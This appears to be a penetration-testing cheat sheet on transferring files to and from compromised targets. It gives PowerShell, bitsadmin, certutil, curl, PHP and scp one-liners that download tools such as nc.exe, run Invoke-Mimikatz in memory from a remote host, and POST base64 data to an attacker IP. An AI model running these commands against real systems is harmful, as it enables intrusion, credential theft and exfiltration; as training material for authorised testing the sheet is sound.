File Transfers

  • In penetration testing, you will usually need to transfer files to and from your targets. For example, you might exploit a target and need to upload a script to check for vulnerabilities in the system.

  • Since there are usually restrictions in place, you need to know different techniques. If one technique doesnโ€™t work, you can try another or even combine or chain different techniques to bypass the controls of the target.

  • There are multiple techniques that work in different situations, some of which utilize Living off the Land binaries. These binaries can be checked here:

    • Windows - https://lolbas-project.github.io/

    • Linux - https://gtfobins.github.io/

  • Below is a cheatsheet with some of the techniques:

Invoke-WebRequest <Target>/<File-to-Download> -OutFile <Output-File-Name> # Download a file using Powershell. Example: Invoke-WebRequest https://<snip>/PowerView.ps1 -OutFile PowerView.ps1

Invoke-WebRequest <File-to-Download> -UserAgent [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome -OutFile "<Output-File>" # Changing the User agent. Example: Invoke-WebRequest http://nc.exe -UserAgent [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome -OutFile "nc.exe" # Changing the User agent.

IEX (New-Object Net.WebClient).DownloadString('<Target>/<File-to-Execute>') # Execute a file in memory using powershell. Example: IEX (New-Object Net.WebClient).DownloadString('https://<snip>/Invoke
Mimikatz.ps1')

Invoke-WebRequest -Uri <Target-to-Upload> -Method POST -Body <Data-to-Upload> # Upload a file using Powershell. Example: Invoke-WebRequest -Uri http://10.10.10.32:443 -Method POST -Body $b64

bitsadmin /transfer n <Source-to-Download-from>/<File-Name> <Output-Path> # Download a file using bitsadmin. Example:  bitsadmin /transfer n http://10.10.10.32/nc.exe C:\Temp\nc.exe

certutil.exe -verifyctl -split -f <Source-to-Download-From>/<File-Name> # Download a file using certutil. Example: certutil.exe -verifyctl -split -f http://10.10.10.32/nc.exe

wget <Link-to-Download-From> # Downloading a file using wget.

curl -o <Output-File-Name> <URL-to-Download-From> # Download a file using curl.

php -r '$file = file_get_contents("<Source-to-Download-from>"); file_put_contents("<Output-File>",$file);' # Download a file using PHP

scp <Output-File> <Source-to-Download-from> # Download a file using scp. Example: scp C:\Temp\bloodhound.zip user@10.10.10.150:/tmp/bloodhound.zip

Last updated